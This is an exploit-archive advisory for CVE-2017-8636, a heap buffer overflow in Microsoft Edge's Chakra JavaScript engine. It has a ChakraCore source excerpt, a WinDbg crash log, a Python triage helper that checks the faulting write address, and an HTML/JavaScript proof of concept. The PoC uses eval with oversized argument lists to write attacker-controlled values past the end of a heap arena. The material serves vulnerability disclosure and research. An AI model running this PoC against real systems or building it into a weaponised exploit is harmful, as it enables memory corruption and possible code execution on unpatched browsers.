Microsoft Edge Chakra Heap Buffer Overflow

Posted Aug 20, 2017
Authored by He Xiaoxiao, Huang Anwen

Microsoft Edge Chakra suffers from a heap buffer overflow vulnerability.

tags | exploit, overflow
advisories | CVE-2017-8636
SHA-256 | c87c5886e5b3749a1661ee361d2c847e905a9fb0f020a8c4d4f8316cf59c7d64

<!--
Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team

This is the HEAP BASED OVERFLOW version of the issue.

// ChakraCore-master\lib\Runtime\Language\InterpreterStackFrame.cpp
Var InterpreterStackFrame::InterpreterHelper(ScriptFunction* function, ArgumentReader args, void* returnAddress, void* addressOfReturnAddress, const bool isAsmJs)
{

[...]

if (!isAsmJs && executeFunction->IsCoroutine())
{
[...]
}
else
{
InterpreterStackFrame::Setup setup(function, args);
size_t varAllocCount = setup.GetAllocationVarCount();
//printf("varAllocCount: %d(%X)\r\n", varAllocCount, varAllocCount);
size_t varSizeInBytes = varAllocCount * sizeof(Var);

//
// Allocate a new InterpreterStackFrame instance on the interpreter's virtual stack.
//
DWORD_PTR stackAddr;

// If the locals area exceeds a certain limit, allocate it from a private arena rather than
// this frame. The current limit is based on an old assert on the number of locals we would allow here.
if (varAllocCount > InterpreterStackFrame::LocalsThreshold) //we can make this condition satisfied so the buffer will be allocated on the heap instead of the stack!!!
{
ArenaAllocator *tmpAlloc = nullptr;
fReleaseAlloc = functionScriptContext->EnsureInterpreterArena(&tmpAlloc);
allocation = (Var*)tmpAlloc->Alloc(varSizeInBytes);
stackAddr = reinterpret_cast<DWORD_PTR>(&allocation); // use a stack address so the debugger stepping logic works (step-out, for example, compares stack depths to determine when to complete the step)
}
else
{
PROBE_STACK_PARTIAL_INITIALIZED_INTERPRETER_FRAME(functionScriptContext, Js::Constants::MinStackInterpreter + varSizeInBytes);
allocation = (Var*)_alloca(varSizeInBytes);
#if DBG
memset(allocation, 0xFE, varSizeInBytes);
#endif
stackAddr = reinterpret_cast<DWORD_PTR>(allocation);
}

[...]
return aReturn;
}





Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach
Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols
Executable search path is:
(11fc.108c): Access violation - code c0000005 (!!! second chance !!!)
chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:
00007ff9`f124bcad 488904d1 mov qword ptr [rcx+rdx*8],rax ds:0000015e`3d550000=????????????????
0:016> r
rax=0001000042424242 rbx=000000388f1fb8b0 rcx=0000015e3d5401b0
rdx=0000000000001fca rsi=0000000000000002 rdi=000000388f1fb3c0
rip=00007ff9f124bcad rsp=000000388f1fbae0 rbp=000000388f1fbb10
r8=0000015e3d500030 r9=0000015e2c538000 r10=000000388f1fb918
r11=0000015e2c53c000 r12=0000000000000000 r13=0000015e2932a120
r14=0000000000000000 r15=0000015e4063f9b3
iopl=0 nv up ei pl nz ac pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010210
chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:
00007ff9`f124bcad 488904d1 mov qword ptr [rcx+rdx*8],rax ds:0000015e`3d550000=????????????????
0:016> dq ecx
0000015e`3d5401b0 00000000`00000000 00010000`42424242
0000015e`3d5401c0 00010000`42424242 00010000`42424242
0000015e`3d5401d0 00010000`42424242 00010000`42424242
0000015e`3d5401e0 00010000`42424242 00010000`42424242
0000015e`3d5401f0 00010000`42424242 00010000`42424242
0000015e`3d540200 00010000`42424242 00010000`42424242
0000015e`3d540210 00010000`42424242 00010000`42424242
0000015e`3d540220 00010000`42424242 00010000`42424242

0:016> dq [ecx+edx*8]
0000015e`3d550000 ????????`???????? ????????`????????
0000015e`3d550010 ????????`???????? ????????`????????
0000015e`3d550020 ????????`???????? ????????`????????
0000015e`3d550030 ????????`???????? ????????`????????
0000015e`3d550040 ????????`???????? ????????`????????
0000015e`3d550050 ????????`???????? ????????`????????
0000015e`3d550060 ????????`???????? ????????`????????
0000015e`3d550070 ????????`???????? ????????`????????
0:016> !address ecx


Failed to map Heaps (error 8007001e)
Usage: <unclassified>
Allocation Base: 0000015e`3d500000
Base Address: 0000015e`3d500000
End Address: 0000015e`3d550000
Region Size: 00000000`00050000
Type: 00020000 MEM_PRIVATE
State: 00001000 MEM_COMMIT
Protect: 00000004 PAGE_READWRITE

0:016> !address 0000015e`3d550000
Usage: Free
Base Address: 0000015e`3d550000
End Address: 0000015e`3d7f0000
Region Size: 00000000`002a0000
Type: 00000000
State: 00010000 MEM_FREE
Protect: 00000001 PAGE_NOACCESS

0:016> kb
RetAddr : Args to Child : Call Site
00007ff9`f10fe96d : 0000015e`3d500030 0000015e`4063f9ac 00000038`8f1fbb70 0000015e`4063f9ac : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d
00007ff9`f0f5ffb1 : 0000015e`3d500030 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x19e8fd
00007ff9`f0ff80cc : 0000015e`3d500030 0000015e`3c7a01a0 00000038`8f1fbc30 00007ff9`f0ebc500 : chakra!Js::InterpreterStackFrame::Process+0x1b1
00007ff9`f0ff7be1 : 0000015e`2c560600 00000038`8f1fbe10 0000015e`3c7e0fba 00000038`8f1fbe28 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
0000015e`3c7e0fba : 00000038`8f1fbe60 0000015e`2c560600 ffffffff`fffffffe 00007ff9`f10d6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51
00007ff9`f0e783df : 0000015e`2c560600 00000000`04000001 0000015e`2c550020 00000038`8f1fbef0 : 0x15e`3c7e0fba
00007ff9`f0e7816a : 0000015e`3c7a01a0 0000015e`2c560600 00007ff9`f15a9f80 00000038`8f1fbef0 : chakra!Js::GlobalObject::ExecuteEvalParsedFunction+0x77
00007ff9`f0e77fb8 : 0000015e`2c540000 00007ff9`f15a9f80 0000015e`00000000 0000015e`2c53c000 : chakra!Js::GlobalObject::VEval+0x19a
00007ff9`f0e77ecd : 00000038`8f1fc040 0000015e`2c53b5c0 0000015e`2932a120 00000038`8f1fc000 : chakra!Js::GlobalObject::EntryEvalHelper+0xc8
00007ff9`f10d6be3 : 0000015e`2c53b5c0 00000000`18000003 0000015e`2c550020 0000015e`2c54d770 : chakra!Js::GlobalObject::EntryEval+0x7d
00007ff9`f0fc6bf3 : 0000015e`2932a120 00000000`00000018 00000038`8f1fc0e8 0000015e`2c53c000 : chakra!amd64_CallFunction+0x93
00007ff9`f0e871ac : 0000015e`2c53b5c0 00007ff9`f0e77e50 00000038`8f1fc110 00000038`8f1fc2a0 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
00007ff9`f0e877b4 : 00000038`8f1fc2a0 0000015e`3c7c0116 0000015e`2c53b5c0 00007ff9`00000008 : chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > > >+0x114
00007ff9`f0f64920 : 00000038`8f1fc2a0 0000015e`3c7c0116 0000015e`8f1fc2a0 0000015e`3c7c0124 : chakra!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallIExtendedFlags<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > >+0x5c
00007ff9`f0f5ff2c : 00000038`8f1fc2a0 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessProfiled+0x1250
00007ff9`f0ff80cc : 00000038`8f1fc2a0 0000015e`3c7a0000 00000038`8f1fc4a0 00000000`00000001 : chakra!Js::InterpreterStackFrame::Process+0x12c
00007ff9`f0ff7be1 : 0000015e`2c560480 00000038`8f1fc680 0000015e`3c7e0fc2 00000038`8f1fc698 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
0000015e`3c7e0fc2 : 00000038`8f1fc6d0 00000000`00000000 00000000`00000000 00007ff9`f10d6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51
00007ff9`f10d6be3 : 0000015e`2c560480 00000000`00000000 00000000`00000000 00000000`00000000 : 0x15e`3c7e0fc2
00007ff9`f0fc6bf3 : 0000015e`2932a120 00000000`00000000 0000015e`29352a10 00007ff9`f0fda837 : chakra!amd64_CallFunction+0x93
00007ff9`f0ff1810 : 0000015e`2c560480 00007ff9`f10d6df0 00000038`8f1fc7d0 0000015e`2932d110 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
00007ff9`f0ff0a37 : 0000015e`2c560480 00000038`8f1fc8c0 0000015e`2932d110 00007ffa`11697100 : chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x100
00007ff9`f10b907e : 0000015e`2c560480 00000038`8f1fc920 0000015e`2932d110 0000015e`2932da00 : chakra!Js::JavascriptFunction::CallRootFunction+0x4b
00007ff9`f101cd54 : 0000015e`2c560480 00000038`8f1fc960 00000000`00000000 00000038`8f1fc978 : chakra!ScriptSite::CallRootFunction+0x6a
00007ff9`f0fb1b49 : 0000015e`2932d000 0000015e`2c560480 00000038`8f1fca10 00000000`00000000 : chakra!ScriptSite::Execute+0x124
00007ff9`f0fb2e8e : 0000015e`29329cd0 00000038`8f1fcf18 00000038`8f1fcf50 00000038`80000082 : chakra!ScriptEngine::ExecutePendingScripts+0x1a5
00007ff9`f0fb3121 : 0000015e`29329cd0 0000015e`29ce82e4 00000000`00000000 00000156`270b4330 : chakra!ScriptEngine::ParseScriptTextCore+0x436
00007ff9`f1a53c75 : 0000015e`29329d20 0000015e`29ce82e4 00000156`000000f1 00000000`00000000 : chakra!ScriptEngine::ParseScriptText+0xb1
00007ff9`f1a53abe : 00000000`00000000 00000038`8f1fcde9 00000156`270b4260 00000156`00000000 : edgehtml!CJScript9Holder::ParseScriptText+0x119
00007ff9`f1a535d7 : 00000000`00000000 00000156`270b4260 00000156`2703c1c0 00000156`270b41b0 : edgehtml!CScriptCollection::ParseScriptText+0x202
00007ff9`f1a52f07 : 00000156`27050c01 00000156`270ac100 00000156`00000082 00007ff9`00000000 : edgehtml!CScriptData::CommitCode+0x357
00007ff9`f1b12f8d : 00000000`ffffffff 00000156`2703c460 00000000`ffffffff 00000000`00000000 : edgehtml!CScriptData::Execute+0x20f
00007ff9`f19543d4 : 00000000`00000000 00000156`2708c440 00000000`00000001 00007ff9`f1b0ceb9 : edgehtml!CHtmScriptParseCtx::Execute+0x7d
00007ff9`f19534a1 : 00000156`27050c00 00000000`00000000 00000156`27050c00 00000156`2702c8c0 : edgehtml!CHtmParseBase::Execute+0x204
00007ff9`f1b0d23b : 00000000`00026e8b 00000156`27020000 00000156`270800b0 00000156`2702c8c0 : edgehtml!CHtmPost::Exec+0x1e1
00007ff9`f1b0d11f : 00000156`2702c8c0 00000000`00026e8b 0000015e`29ce82e0 00000000`00000000 : edgehtml!CHtmPost::Run+0x2f
00007ff9`f1b0cfd3 : 00000156`27020000 00000000`09806f01 00000000`00000002 00000156`27061680 : edgehtml!PostManExecute+0x63
00007ff9`f1b0ce6d : 00000156`2702c8c0 00000000`09806ff9 0000015e`00000000 00007ffa`083a4779 : edgehtml!PostManResume+0xa3
00007ff9`f1b1b353 : 00000156`27048600 0000015e`29c26b50 00000000`00000000 00000000`00000000 : edgehtml!CHtmPost::OnDwnChanCallback+0x3d
00007ff9`f1af50db : 00000156`270282d0 0000015e`29325463 0000015e`29302200 00000038`8f1fd4a0 : edgehtml!CDwnChan::OnMethodCall+0x23
00007ff9`f1981706 : 0000015e`29302728 00000156`27061680 0000015e`29302260 00000038`8f1fd4d0 : edgehtml!GWndAsyncTask::Run+0x1b
00007ff9`f1aca860 : 00000000`16389c44 00000156`270616e0 00000156`270800b0 00007ff9`f1a29138 : edgehtml!HTML5TaskScheduler::RunReadiedTask+0x236
00007ff9`f1aca683 : 0000015e`29c26b50 00000000`00000000 00000000`00000002 00000156`27028170 : edgehtml!TaskSchedulerBase::RunReadiedTasksInTaskQueueWithCallback+0x70
00007ff9`f19822b3 : 00000038`8f1fd980 00000000`00008002 00000156`27028170 00007ffa`10d847df : edgehtml!HTML5TaskScheduler::RunReadiedTasks+0xa3
00007ff9`f19807a5 : 00000000`00008002 00000156`27020000 00000156`00000000 00000000`00000002 : edgehtml!NormalPriorityAtInputEventLoopDriver::DriveRegularPriorityTaskExecution+0x53
00007ffa`10d6bc50 : 00000000`00e80380 00000000`00000001 00000000`00000002 00000000`80000012 : edgehtml!GlobalWndProc+0x125
00007ffa`10d6b5cf : 00000156`276d4470 00007ff9`f1980680 00000000`00e80380 00000000`00e80380 : USER32!UserCallWinProcCheckWow+0x280
00007ff9`f3686d0e : 00000038`8f1fd920 00000000`00000000 00000156`26f58170 00000000`00000000 : USER32!DispatchMessageWorker+0x19f
00007ff9`f369eecb : 00000000`00000000 00000000`00000001 00000156`27229e70 00000156`26fd40f0 : EdgeContent!CBrowserTab::_TabWindowThreadProc+0x3ee
00007ff9`ff58b4a8 : 00000000`00000000 00000156`27228f80 00000000`00000000 00000000`00000000 : EdgeContent!LCIETab_ThreadProc+0x2ab
00007ffa`11a02774 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msiso!_IsoThreadProc_WrapperToReleaseScope+0x48
00007ffa`13770d61 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
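Added triage helper, not part of the advisory: it recomputes the address of the faulting store `mov qword ptr [rcx+rdx*8],rax` from the `r` dump and places it against the committed region reported by `!address ecx`, so the crash can be confirmed as a write starting exactly at the first byte past the arena region rather than a wild pointer. The register and region values are copied from the crash log above; the function names and the tagged-int decoding helper are mine.

```python
import re

# Constructed from the crash log in this advisory (partial 'r' and '!address' output).
REG_DUMP = """\
rax=0001000042424242 rbx=000000388f1fb8b0 rcx=0000015e3d5401b0
rdx=0000000000001fca rsi=0000000000000002 rdi=000000388f1fb3c0
"""
ADDRESS_INFO = """\
Allocation Base: 0000015e`3d500000
Base Address: 0000015e`3d500000
End Address: 0000015e`3d550000
State: 00001000 MEM_COMMIT
"""

MASK64 = (1 << 64) - 1
ATOM_TAG_INTPTR = 1 << 48  # Chakra x64 tag marking a Var as a boxed 32-bit integer

def parse_registers(text):
    """Return {name: value} for every 16-hex-digit reg=value pair in a WinDbg 'r' dump."""
    return {m.group(1): int(m.group(2), 16)
            for m in re.finditer(r"\b([a-z]\w*)=([0-9a-fA-F]{16})\b", text)}

def parse_address(text):
    """Return (base, end) from the Base/End Address lines of a WinDbg '!address' block."""
    found = {}
    for m in re.finditer(r"^(Base Address|End Address): ([0-9a-f`]+)$", text, re.M):
        found[m.group(1)] = int(m.group(2).replace("`", ""), 16)
    return found["Base Address"], found["End Address"]

def effective_address(regs, base="rcx", index="rdx", scale=8):
    """Address targeted by 'mov [base+index*scale]', with 64-bit wraparound."""
    return (regs[base] + regs[index] * scale) & MASK64

def classify_write(regs, region, width=8, base="rcx", index="rdx"):
    """Place the faulting store relative to the committed region holding the base pointer."""
    lo, hi = region
    addr = effective_address(regs, base, index, width)
    in_region = lo <= addr and addr + width <= hi
    return {
        "address": addr,
        "in_region": in_region,
        # 0 means the store begins at the very first byte past the region's end
        "offset_past_end": addr - hi if addr >= hi else None,
        # number of width-sized slots between the base pointer and the region end;
        # an index equal to this value is the first slot that is out of bounds
        "slots_in_region": (hi - regs[base]) // width,
        "index": regs[index],
    }

def decode_var(value):
    """Decode a Chakra x64 Var: tagged int when the TaggedInt tag is set, else a pointer."""
    if (value >> 32) == (ATOM_TAG_INTPTR >> 32):
        return ("tagged_int", value & 0xFFFFFFFF)
    return ("pointer", value)

if __name__ == "__main__":
    regs = parse_registers(REG_DUMP)
    result = classify_write(regs, parse_address(ADDRESS_INFO))
    print("store address  : %#x (in region: %s)" % (result["address"], result["in_region"]))
    print("index %#x of %#x slots, value written: %r"
          % (result["index"], result["slots_in_region"], decode_var(regs["rax"])))
```

Run against the values above, the store lands at offset 0 past the region end with index 0x1fca equal to the slot count, i.e. the first element beyond the 0x50000-byte arena region, and the value written decodes to the tagged integer 0x42424242 from the PoC.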

-->
<html>
<head>
<title> POC </title>
</head>
<script>

var a=[];
a.length=0xffff-1;
a.fill('0x42424242');

var s='{';
for(var i=0; i<0x8000-1; i++){
s+= 'a'+i+':0,'
};
s+= 'b:0';
s+= '}';

var c='function Car(){}; var car=new Car(' + a.join() + ',' + s + ')';
eval(c);

</script>
</html>
